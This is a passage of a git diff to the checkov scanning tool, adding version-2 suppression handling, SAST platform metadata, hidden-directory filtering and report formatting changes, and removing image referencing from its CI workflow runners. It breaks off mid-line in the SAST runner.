b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py index 173c258cde8..385f52ea6e7 100644 --- a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py @@ -23,6 +23,7 @@ # service-provider::service-name::data-type-name CFN_RESOURCE_TYPE_IDENTIFIER = re.compile(r"^[a-zA-Z0-9]+::[a-zA-Z0-9]+::[a-zA-Z0-9]+$") SAST_CATEGORY = 'Sast' +LICENSES_CATEGORY = 'Licenses' class CustomPoliciesIntegration(BaseIntegrationFeature): @@ -68,6 +69,10 @@ def pre_scan(self) -> None: self.bc_cloned_checks[source_incident_id].append(policy) continue resource_types = Registry._get_resource_types(converted_check['metadata']) + + if policy.get('category') == LICENSES_CATEGORY: + continue + check = self.platform_policy_parser.parse_raw_check(converted_check, resources_types=resource_types) check.severity = Severities[policy['severity']] check.bc_id = check.id diff --git a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py index d3853f9e90b..dc3bbbc594c 100644 --- a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py @@ -22,6 +22,7 @@ class PolicyMetadataIntegration(BaseIntegrationFeature): def __init__(self, bc_integration: BcPlatformIntegration) -> None: super().__init__(bc_integration=bc_integration, order=0) self.check_metadata: dict[str, Any] = {} + self.sast_check_metadata: dict[str, Any] = {} self.bc_to_ckv_id_mapping: dict[str, str] = {} self.pc_to_ckv_id_mapping: dict[str, str] = {} self.ckv_id_to_source_incident_id_mapping: dict[str, str] = {} @@ -145,6 +146,8 @@ def _handle_public_metadata(self, check_metadata: dict[str, Any]) -> None: def _handle_customer_run_config(self, run_config: dict[str, Any]) -> None: self.check_metadata = run_config['policyMetadata'] for ckv_id, pol in self.check_metadata.items(): + if 'SAST' in ckv_id: + self.sast_check_metadata[ckv_id] = pol self.bc_to_ckv_id_mapping[pol['id']] = ckv_id if self.bc_integration.is_prisma_integration() and pol.get('pcPolicyId'): self.pc_to_ckv_id_mapping[pol['pcPolicyId']] = ckv_id diff --git a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py index 4758d3783fc..5f88dd3d91f 100644 --- a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py @@ -1,9 +1,10 @@ from __future__ import annotations +import itertools import logging import re from itertools import groupby -from typing import TYPE_CHECKING, Pattern, Any +from typing import TYPE_CHECKING, Pattern, Any, Optional from checkov.common.bridgecrew.check_type import CheckType @@ -26,6 +27,7 @@ class SuppressionsIntegration(BaseIntegrationFeature): def __init__(self, bc_integration: BcPlatformIntegration) -> None: super().__init__(bc_integration=bc_integration, order=2) # must be after the custom policies integration + self.suppressions_v2: dict[str, list[dict[str, Any]]] = {} self.suppressions: dict[str, list[dict[str, Any]]] = {} # bcorgname_provider_timestamp (ex: companyxyz_aws_1234567891011) @@ -52,26 +54,56 @@ def pre_scan(self) -> None: return suppressions = self.bc_integration.customer_run_config_response.get('suppressions') + suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2') # currently just SAST for suppression in suppressions: + suppression['isV1'] = True if suppression['policyId'] in metadata_integration.bc_to_ckv_id_mapping: suppression['checkovPolicyId'] = metadata_integration.get_ckv_id_from_bc_id(suppression['policyId']) else: suppression['checkovPolicyId'] = suppression['policyId'] # custom policy + for suppression in suppressions_v2: + suppression['isV1'] = False + checkov_ids = [] + for policy_id in suppression['policyIds']: + if policy_id in metadata_integration.bc_to_ckv_id_mapping: + checkov_ids.append(metadata_integration.bc_to_ckv_id_mapping[policy_id]) + else: + checkov_ids.append(policy_id) # custom policy - not supported yet + suppression['checkovPolicyIds'] = checkov_ids + self._init_repo_regex() suppressions = sorted(suppressions, key=lambda s: s['checkovPolicyId']) # group and map by policy ID self.suppressions = {policy_id: list(sup) for policy_id, sup in groupby(suppressions, key=lambda s: s['checkovPolicyId'])} - logging.debug(f'Found {len(self.suppressions)} valid suppressions from the platform.') - logging.debug('The found suppression rules are:') + + # map suppressions v2 by checkov ID - because the policy IDs are arrays, we need to map each unique ID in each + # suppression's policy ID array to its suppressions + self.suppressions_v2 = SuppressionsIntegration.create_suppression_v2_policy_id_map(suppressions_v2) + + logging.debug('The found suppression v1 rules are:') logging.debug(self.suppressions) + logging.debug('The found suppression v2 rules are:') + logging.debug(self.suppressions_v2) + except Exception: self.integration_feature_failures = True logging.debug("Scanning without applying suppressions configured in the platform.", exc_info=True) + @staticmethod + def create_suppression_v2_policy_id_map(suppressions_v2: list[dict[str, Any]]) -> dict[str, list[dict[str, Any]]]: + checkov_id_map: dict[str, list[dict[str, Any]]] = {} + for suppression in suppressions_v2: + for checkov_id in suppression['checkovPolicyIds']: + if checkov_id in checkov_id_map: + checkov_id_map[checkov_id].append(suppression) + else: + checkov_id_map[checkov_id] = [suppression] + return checkov_id_map + def post_runner(self, scan_report: Report) -> None: self._apply_suppressions_to_report(scan_report) @@ -89,10 +121,13 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None: check.check_id = 'BC_VUL_1' relevant_suppressions = self.suppressions.get(check.check_id) + relevant_suppressions_v2 = self.suppressions_v2.get(check.check_id) + + has_suppression = relevant_suppressions or relevant_suppressions_v2 - applied_suppression = self._check_suppressions(check, relevant_suppressions) if relevant_suppressions else None + applied_suppression = self._check_suppressions(check, relevant_suppressions, relevant_suppressions_v2) if has_suppression else None if applied_suppression: - suppress_comment = applied_suppression['comment'] + suppress_comment = applied_suppression['comment'] if applied_suppression['isV1'] else applied_suppression['justificationComment'] logging.debug(f'Applying suppression to the check {check.check_id} with the comment: {suppress_comment}') check.check_result = { 'result': CheckResult.SKIPPED, @@ -107,17 +142,19 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None: scan_report.failed_checks = still_failed_checks scan_report.passed_checks = still_passed_checks - def _check_suppressions(self, record: Record, suppressions: list[dict[str, Any]]) -> dict[str, Any] | None: + def _check_suppressions(self, record: Record, suppressions: Optional[list[dict[str, Any]]], suppressions_v2: Optional[list[dict[str, Any]]]) -> dict[str, Any] | None: """ - Checks the specified suppressions against the specified record, returning the first applicable suppression, - or None of no suppression is applicable. - :param record: - :param suppressions: + Checks the specified suppressions against the specified record, returning the applied suppression, if any, else None :return: """ - for suppression in suppressions: - if self._check_suppression(record, suppression): - return suppression + if suppressions: + for suppression in suppressions: + if self._check_suppression(record, suppression): + return suppression + if suppressions_v2: + for suppression in suppressions_v2: + if self._check_suppression_v2(record, suppression): + return suppression return None def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> bool: @@ -189,6 +226,38 @@ def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> boo return False + @staticmethod + def normalize_file_path(file_path: str) -> str: + """ + Returns the file path with a leading slash, if not already present + """ + return file_path if file_path.startswith('/') else f'/{file_path}' + + def _check_suppression_v2_file(self, record_file_path: str, suppression_file_path: str, suppression_repo_name: str) -> bool: + return self.bc_integration.repo_matches(suppression_repo_name)\ + and (suppression_file_path == record_file_path or suppression_file_path == convert_to_unix_path(record_file_path)) + + def _check_suppression_v2(self, record: Record, suppression: dict[str, Any]) -> bool: + if record.check_id not in suppression['checkovPolicyIds']: + return False + + type = suppression['ruleType'] + + if type == 'policy': + # We just checked the policy ID above + return True + elif type == 'finding': + pass # TODO how to map them? + elif type == 'file': + record_file_path = SuppressionsIntegration.normalize_file_path(record.repo_file_path) + for file_suppression in suppression['files']: + suppression_file_path = SuppressionsIntegration.normalize_file_path(file_suppression['filePath']) + if self._check_suppression_v2_file(record_file_path, suppression_file_path, file_suppression.get('repositoryName', '')): + return True + elif type == 'repository': + return any(self.bc_integration.repo_matches(repo.get('repositoryName', '')) for repo in suppression['repositories']) + return False + def _get_cve_suppression_path(self, suppression: dict[str, Any]) -> str: suppression_path: str = align_path(suppression['cves'][0]['id']) # for handling cases of IR/docker (e.g: '/Dockerfile:/DockerFile.FROM) @@ -231,12 +300,12 @@ def pre_runner(self, runner: _BaseRunner) -> None: # not used pass - def get_policy_level_suppressions(self) -> dict[str, str]: + def get_policy_level_suppressions(self) -> dict[str, list[str]]: policy_level_suppressions = {} - for check_suppressions in self.suppressions.values(): + for check_suppressions in itertools.chain(self.suppressions.values(), self.suppressions_v2.values()): for suppression in check_suppressions: - if suppression.get("suppressionType") == "Policy": - policy_level_suppressions[suppression['id']] = suppression['policyId'] + if (suppression['isV1'] and suppression.get("suppressionType") == "Policy") or (not suppression['isV1'] and suppression.get("ruleType") == "policy"): + policy_level_suppressions[suppression['id']] = [suppression['policyId']] if suppression['isV1'] else suppression['policyIds'] break return policy_level_suppressions diff --git a/checkov/common/bridgecrew/platform_integration.py b/checkov/common/bridgecrew/platform_integration.py index 19ae7da9925..8af6863a521 100644 --- a/checkov/common/bridgecrew/platform_integration.py +++ b/checkov/common/bridgecrew/platform_integration.py @@ -19,6 +19,7 @@ import boto3 import dpath import urllib3 +import urllib.parse from botocore.config import Config from botocore.exceptions import ClientError from cachetools import cached, TTLCache @@ -1415,6 +1416,12 @@ def get_sso_prismacloud_url(self, report_url: str) -> str: # If there are any query parameters, append them to the URI if parsed_url.query: uri = f"{uri}?{parsed_url.query}" + + # First encoding + encoded_uri = urllib.parse.quote(uri) + + # Second encoding + uri = urllib.parse.quote(encoded_uri) # Check if the URL already contains GET parameters. if "?" in access_saml_url: report_url = f"{access_saml_url}&{relay_state_param_name}={uri}" diff --git a/checkov/common/graph/graph_builder/graph_components/attribute_names.py b/checkov/common/graph/graph_builder/graph_components/attribute_names.py index ed796ee0137..2439c8efa33 100644 --- a/checkov/common/graph/graph_builder/graph_components/attribute_names.py +++ b/checkov/common/graph/graph_builder/graph_components/attribute_names.py @@ -23,6 +23,7 @@ class CustomAttributes: ENCRYPTION = "encryption_" ENCRYPTION_DETAILS = "encryption_details_" TF_RESOURCE_ADDRESS = "__address__" + PROVIDER_ADDRESS = "__provider_address__" REFERENCES = "references_" FOREACH_ATTRS = "foreach_attrs_" SOURCE_MODULE_OBJECT = "source_module_object_" diff --git a/checkov/common/output/report.py b/checkov/common/output/report.py index b2aece61b15..1d46ec8ee4f 100644 --- a/checkov/common/output/report.py +++ b/checkov/common/output/report.py @@ -367,20 +367,30 @@ def print_failed_github_md(self, use_bc_ids: bool = False) -> str: result.append( [ record.get_output_id(use_bc_ids), - record.file_path, - record.resource, record.check_name, - record.guideline, + record.resource, + f"[Link]({record.guideline})", + record.file_path, ] ) if result: + summary = self.get_summary() + if self.parsing_errors: + message = "Passed Checks: {}, Failed Checks: {}, Skipped Checks: {}, Parsing Errors: {}\n\n".format( + summary["passed"], + summary["failed"], + summary["skipped"], + summary["parsing_errors"], + ) + else: + message = f"```\nPassed Checks: {summary['passed']}, Failed Checks: {summary['failed']}, Skipped Checks: {summary['skipped']}\n```\n\n" + table = tabulate( result, - headers=["check_id", "file", "resource", "check_name", "guideline"], + headers=["Check ID", "Check Name", "Resource", "Guideline", "File"], tablefmt="github", - showindex=True, ) - output_data = f"### {self.check_type} scan results:\n\n{table}\n\n---\n" + output_data = f"### {self.check_type.replace('_', ' ').title()} Scan Results:\n\n{message}{table}\n\n---\n" return output_data else: return "\n\n---\n\n" diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py index a41397fa722..15eaba47e9c 100644 --- a/checkov/common/runners/object_runner.py +++ b/checkov/common/runners/object_runner.py @@ -123,13 +123,13 @@ def run( if self.graph_registry: self.graph_registry.load_external_checks(directory) + if root_folder: + self.root_folder = root_folder + if not self.context or not self.definitions: if files: self._load_files(files) - if root_folder: - self.root_folder = root_folder - for root, d_names, f_names in os.walk(root_folder): filter_ignored_paths(root, d_names, runner_filter.excluded_paths, self.included_paths()) filter_ignored_paths(root, f_names, runner_filter.excluded_paths, self.included_paths()) diff --git a/checkov/common/sast/consts.py b/checkov/common/sast/consts.py index b52d8a8609e..ee568dcbe7f 100644 --- a/checkov/common/sast/consts.py +++ b/checkov/common/sast/consts.py @@ -36,7 +36,6 @@ def set(cls) -> Set["CDKLanguages"]: PYTHON = 'python' TYPESCRIPT = 'typescript' - GOLANG = 'golang' class BqlVersion(str, Enum): diff --git a/checkov/common/util/env_vars_config.py b/checkov/common/util/env_vars_config.py index 96157ef1811..047a317b222 100644 --- a/checkov/common/util/env_vars_config.py +++ b/checkov/common/util/env_vars_config.py @@ -21,6 +21,7 @@ def __init__(self) -> None: self.CACHE_DIR = convert_str_to_bool(os.getenv("CKV_CACHE_DIR", str(Path(tempfile.gettempdir()) / "cache"))) self.CHECK_FAIL_LEVEL = os.getenv("CHECKOV_CHECK_FAIL_LEVEL", CheckFailLevel.ERROR) self.CREATE_COMPLEX_VERTICES = convert_str_to_bool(os.getenv("CREATE_COMPLEX_VERTICES", True)) + self.CHECKOV_ENABLE_DATAS_FOREACH_HANDLING = os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False') self.CREATE_EDGES = convert_str_to_bool(os.getenv("CREATE_EDGES", True)) self.CREATE_MARKDOWN_HYPERLINKS = convert_str_to_bool(os.getenv("CHECKOV_CREATE_MARKDOWN_HYPERLINKS", False)) self.CREATE_SCA_IMAGE_REPORTS_FOR_IR = convert_str_to_bool( diff --git a/checkov/common/util/type_forcers.py b/checkov/common/util/type_forcers.py index 371e53ba7cf..d663b56b49a 100644 --- a/checkov/common/util/type_forcers.py +++ b/checkov/common/util/type_forcers.py @@ -140,11 +140,10 @@ def convert_prisma_policy_filter_to_dict(filter_string: str) -> Dict[Any, Any]: """ filter_params = {} if isinstance(filter_string, str) and filter_string: - filter_string = "".join(filter_string.split()) - try: - for f in filter_string.split(','): + for f in filter_string.split(','): + try: f_name, f_value = f.split('=') - filter_params[f_name] = f_value - except (IndexError, ValueError) as e: - logging.debug(f"Invalid filter format: {e}") + filter_params[f_name.strip()] = f_value.strip() + except (IndexError, ValueError) as e: + logging.debug(f"Invalid filter format: {e}") return filter_params diff --git a/checkov/github_actions/image_referencer/__init__.py b/checkov/github_actions/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/github_actions/image_referencer/manager.py b/checkov/github_actions/image_referencer/manager.py deleted file mode 100644 index 822287da929..00000000000 --- a/checkov/github_actions/image_referencer/manager.py +++ /dev/null @@ -1,15 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager -from checkov.github_actions.image_referencer.provider import GithubActionProvider - - -class GithubActionsImageReferencerManager(WorkflowImageReferencerManager): - __slots__ = ("workflow_config", "file_path", "workflow_line_numbers", "provider") - - def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]): - provider = GithubActionProvider(workflow_config=workflow_config, file_path=file_path, - workflow_line_numbers=workflow_line_numbers) - super().__init__(workflow_config, file_path, provider) - self.workflow_line_numbers = workflow_line_numbers diff --git a/checkov/github_actions/image_referencer/provider.py b/checkov/github_actions/image_referencer/provider.py deleted file mode 100644 index e2b4a8e04f8..00000000000 --- a/checkov/github_actions/image_referencer/provider.py +++ /dev/null @@ -1,66 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.common.util.consts import START_LINE, END_LINE - - -class GithubActionProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]): - super().__init__(workflow_config, file_path) - self.workflow_line_numbers = workflow_line_numbers - - def generate_resource_key(self, start_line: int, end_line: int) -> str: - """ - Generate resource key without the previous format of key (needed in get_resource) - """ - jobs_dict: dict[str, Any] = self.workflow_config.get("jobs", {}) - for job_name, job in jobs_dict.items(): - if not isinstance(job, dict): - continue - - if job[START_LINE] <= start_line <= end_line <= job[END_LINE]: - return f'jobs({job_name})' - - return '' - - def extract_images_from_workflow(self) -> list[Image]: - images: list[Image] = [] - - if not isinstance(self.workflow_config, dict): - # make type checking happy - return images - - jobs = self.workflow_config.get("jobs", {}) - for job_object in jobs.values(): - if isinstance(job_object, dict): - container = job_object.get("container", {}) - image = None - start_line = 0 - end_line = 0 - - if isinstance(container, dict): - image = container.get("image", "") - start_line, end_line = container.get(START_LINE, 0), container.get(END_LINE, 0) - elif isinstance(container, str): - image = container - line_to_line_numbers = self.workflow_line_numbers[job_object[START_LINE] - 1:] - image_line = next((line_number for line_number, line in line_to_line_numbers if image in line), None) - if not image_line: - continue - start_line = image_line - end_line = start_line + 1 - - if image: - image_obj = Image( - file_path=self.file_path[self.file_path.index('/.github'):], - name=image, - start_line=start_line, - end_line=end_line, - related_resource_id=self.generate_resource_key(start_line, end_line) - ) - images.append(image_obj) - - return images diff --git a/checkov/github_actions/runner.py b/checkov/github_actions/runner.py index c0d13304225..ce92b7466e7 100644 --- a/checkov/github_actions/runner.py +++ b/checkov/github_actions/runner.py @@ -1,25 +1,19 @@ from __future__ import annotations import logging -import os from collections.abc import Iterable from typing import TYPE_CHECKING, Any import yaml +import checkov.common.parsers.yaml.loader as loader +from checkov.common.bridgecrew.check_type import CheckType from checkov.common.graph.graph_builder.consts import GraphSource from checkov.common.output.report import Report -from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager +from checkov.github_actions.checks.registry import registry from checkov.github_actions.graph_builder.local_graph import GitHubActionsLocalGraph from checkov.github_actions.utils import is_schema_valid, is_workflow_file - from checkov.runner_filter import RunnerFilter - -import checkov.common.parsers.yaml.loader as loader -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.util.type_forcers import force_dict -from checkov.github_actions.checks.registry import registry from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: @@ -27,10 +21,9 @@ from checkov.common.typing import LibraryGraphConnector from checkov.common.runners.graph_builder.local_graph import ObjectLocalGraph from checkov.common.runners.graph_manager import ObjectGraphManager - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.GITHUB_ACTIONS # noqa: CCE003 # a static attribute def __init__( @@ -117,43 +110,8 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - graph_connector=None, - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions, - definitions_raw=self.definitions_raw - ) - - if image_report: - if isinstance(report, list): - return [*report, image_report] - return [report, image_report] - return report - def extract_images( - self, graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions or not definitions_raw: - return images - - for file, config in definitions.items(): - _config = force_dict(config) or {} - manager = GithubActionsImageReferencerManager(workflow_config=_config, file_path=file, - workflow_line_numbers=definitions_raw[file]) - images.extend(manager.extract_images_from_workflow()) - - return images - def populate_metadata_dict(self) -> None: if isinstance(self.definitions, dict): # populate gha metadata dict diff --git a/checkov/gitlab_ci/image_referencer/__init__.py b/checkov/gitlab_ci/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/gitlab_ci/image_referencer/manager.py b/checkov/gitlab_ci/image_referencer/manager.py deleted file mode 100644 index 28abfd40ab1..00000000000 --- a/checkov/gitlab_ci/image_referencer/manager.py +++ /dev/null @@ -1,13 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager -from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider - - -class GitlabCiImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py deleted file mode 100644 index 743ae81197f..00000000000 --- a/checkov/gitlab_ci/image_referencer/provider.py +++ /dev/null @@ -1,62 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive - - -class GitlabCiProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - super().__init__(workflow_config, file_path) - self.supported_keys = ("image", "services") - - def extract_images_from_workflow(self) -> list[Image]: - images = [] - for job_object in self.workflow_config.values(): - if isinstance(job_object, dict): - start_line, end_line = GitlabCiProvider._get_start_end_lines(job_object) - for key, subjob in job_object.items(): - if key in self.supported_keys: - image_name = "" - if isinstance(subjob, dict): - if 'name' not in subjob: - continue - start_line, end_line = GitlabCiProvider._get_start_end_lines(subjob) - image_name = subjob['name'] - elif isinstance(subjob, str): - image_name = subjob - elif isinstance(subjob, list): - for service in subjob: - if isinstance(service, dict): - start_line, end_line = GitlabCiProvider._get_start_end_lines(service) - image_name = service['name'] - elif isinstance(service, str): - image_name = service - if image_name: - image_obj = Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, - key='', - start_line=start_line, - end_line=end_line) - ) - images.append(image_obj) - image_name = "" - if image_name: - image_obj = Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, - key='', start_line=start_line, - end_line=end_line) - ) - images.append(image_obj) - return list(set(images)) diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index a58acd9d179..d680383cbb4 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -1,27 +1,21 @@ from __future__ import annotations -import os from typing import TYPE_CHECKING, Any +from checkov.common.bridgecrew.check_type import CheckType from checkov.common.output.report import Report from checkov.common.util.type_forcers import force_dict +from checkov.gitlab_ci.checks.registry import registry from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive - from checkov.runner_filter import RunnerFilter - -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.bridgecrew.check_type import CheckType -from checkov.gitlab_ci.checks.registry import registry -from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry from collections.abc import Iterable - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.GITLAB_CI # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: @@ -69,38 +63,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - graph_connector=None, - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file, config in definitions.items(): - if isinstance(config, list): - continue - - manager = GitlabCiImageReferencerManager(workflow_config=config, file_path=file) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/runner_filter.py b/checkov/runner_filter.py index 0661b39aa54..83911694936 100644 --- a/checkov/runner_filter.py +++ b/checkov/runner_filter.py @@ -396,9 +396,10 @@ def from_dict(obj: Dict[str, Any]) -> RunnerFilter: show_progress_bar, run_image_referencer, enable_secret_scan_all_files, block_list_secret_scan) return runner_filter - def set_suppressed_policies(self, policy_level_suppressions: List[str]) -> None: + def set_suppressed_policies(self, policy_level_suppressions: List[List[str]]) -> None: logging.debug(f"Received the following policy-level suppressions, that will be skipped from running: {policy_level_suppressions}") - self.suppressed_policies = policy_level_suppressions + # flatten + self.suppressed_policies = [suppression for suppression_list in policy_level_suppressions for suppression in suppression_list] @staticmethod def get_sast_languages(frameworks: Optional[List[str]], skip_framework: Optional[List[str]]) -> Set[SastLanguages]: diff --git a/checkov/sast/engines/files_filter_manager.py b/checkov/sast/engines/files_filter_manager.py index ed127244cda..71d64484d23 100644 --- a/checkov/sast/engines/files_filter_manager.py +++ b/checkov/sast/engines/files_filter_manager.py @@ -3,6 +3,7 @@ import json from typing import Set, List, Dict +from checkov.common.runners.base_runner import IGNORE_HIDDEN_DIRECTORY_ENV, ignored_directories from checkov.common.sast.consts import SastLanguages @@ -16,6 +17,7 @@ def get_files_to_filter(self) -> List[str]: try: if SastLanguages.JAVASCRIPT in self.languages: files_to_filter += self._get_js_files_to_filter() + files_to_filter += self._filter_hidden_files() except Exception as e: logging.debug(f'Error filtering js files generated by ts: {e}') return files_to_filter @@ -84,3 +86,16 @@ def _filter_by_tsconfig(tsconfig_files: List[Dict[str, str]]) -> List[str]: build_path = build_dir js_files_to_filter.append(build_path) return js_files_to_filter + + def _filter_hidden_files(self) -> List[str]: + # consider ENV variable to ignore hidden directories (CKV_IGNORED_DIRECTORIES, CKV_IGNORE_HIDDEN_DIRECTORIES) + paths_to_filter: List[str] = ignored_directories.copy() + if not IGNORE_HIDDEN_DIRECTORY_ENV: + return paths_to_filter + for path in self.source_codes: + for (_dirpath, dirs, _) in os.walk(path): + for directory in dirs: + if directory.startswith('.'): + paths_to_filter.append(directory) + + return paths_to_filter diff --git a/checkov/sast/engines/prisma_engine.py b/checkov/sast/engines/prisma_engine.py index a9fdbe36fa1..7d0b0c4c0eb 100644 --- a/checkov/sast/engines/prisma_engine.py +++ b/checkov/sast/engines/prisma_engine.py @@ -14,6 +14,7 @@ from checkov.common.bridgecrew.check_type import CheckType from checkov.common.bridgecrew.platform_integration import bc_integration +from checkov.common.bridgecrew.integration_features.features.policy_metadata_integration import integration as policy_metadata_integration from checkov.common.bridgecrew.platform_key import bridgecrew_dir from checkov.common.bridgecrew.severities import get_severity, Severity, Severities, BcSeverities from checkov.common.models.enums import CheckResult @@ -98,6 +99,7 @@ def get_reports(self, targets: List[str], registry: Registry, languages: Set[Sas 'skip_checks': registry.runner_filter.skip_checks if registry.runner_filter else [], 'check_threshold': check_threshold, 'skip_check_threshold': skip_check_threshold, + 'platform_check_metadata': policy_metadata_integration.sast_check_metadata or {}, 'skip_path': skip_paths, 'report_imports': registry.runner_filter.report_sast_imports if registry.runner_filter else False, 'remove_default_policies': registry.runner_filter.remove_default_sast_policies if registry.runner_filter else False, @@ -201,6 +203,7 @@ def run_go_library(self, languages: Set[SastLanguages], skip_path: List[str], check_threshold: Severity, skip_check_threshold: Severity, + platform_check_metadata: Dict[str, Any], cdk_languages: List[CDKLanguages], list_policies: bool = False, report_imports: bool = True, @@ -230,6 +233,7 @@ def run_go_library(self, languages: Set[SastLanguages], "skip_path": skip_path, "check_threshold": str(check_threshold), "skip_check_threshold": str(skip_check_threshold), + "platform_check_metadata": platform_check_metadata, "list_policies": list_policies, "report_imports": report_imports, "remove_default_policies": remove_default_policies, @@ -474,6 +478,7 @@ def get_policies(self, languages: Set[SastLanguages]) -> SastPolicies: 'skip_checks': [], 'check_threshold': Severities[BcSeverities.NONE], 'skip_check_threshold': Severities[BcSeverities.NONE], + 'platform_check_metadata': policy_metadata_integration.sast_check_metadata, 'skip_path': [], 'report_imports': False, 'report_reachability': False, diff --git a/checkov/sast/prisma_models/library_input.py b/checkov/sast/prisma_models/library_input.py index c4ba4e6b0ac..2780f4f8623 100644 --- a/checkov/sast/prisma_models/library_input.py +++ b/checkov/sast/prisma_models/library_input.py @@ -1,4 +1,4 @@ -from typing import Set, List +from typing import Set, List, Dict, Any from checkov.common.bridgecrew.severities import Severity from checkov.common.sast.consts import SastLanguages, CDKLanguages @@ -18,6 +18,7 @@ class LibraryInput(TypedDict): skip_path: List[str] check_threshold: Severity skip_check_threshold: Severity + platform_check_metadata: Dict[str, Any] list_policies: NotRequired[bool] report_imports: bool remove_default_policies: NotRequired[bool] diff --git a/checkov/sast/runner.py b/checkov/sast/runner.py index bde00259555..98fbb65b85e 100644 --- a/checkov/sast/runner.py +++ b/checkov/sast/runner.py @@ -56,19 +56,10 @@ def run(self, root_folder: Optional[str], bc_integration.setup_http_manager() bc_integration.set_s3_client() - # Todo remove when typescript is stable in platform - if not bool(convert_str_to_bool(os.getenv('ENABLE_SAST_TYPESCRIPT', False))): - if SastLanguages.TYPESCRIPT in runner_filter.sast_languages: - runner_filter.sast_languages.remove(SastLanguages.TYPESCRIPT) - if CDKLanguages.TYPESCRIPT in self.cdk_langs: - self.cdk_langs.remove(CDKLanguages.TYPESCRIPT) - # Todo remove when golang is stable in platform if not bool(convert_str_to_bool(os.getenv('ENABLE_SAST_GOLANG', False))): if SastLanguages.GOLANG in 